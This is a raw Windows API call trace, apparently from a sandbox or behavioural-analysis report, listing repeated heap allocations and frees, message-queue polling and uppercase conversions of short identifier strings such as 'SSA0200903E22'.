0 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.639] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.639] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.639] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d9c0 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d9c0 | out: hHeap=0x25c0000) returned 1 [0256.643] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.643] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.643] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.643] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.644] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.644] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.644] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.645] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.645] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.645] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f8) returned 0x34b2250 [0256.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f8) returned 0x34cee50 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f8) returned 0x34b2250 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cee50 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f8) returned 0x34cee50 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.649] 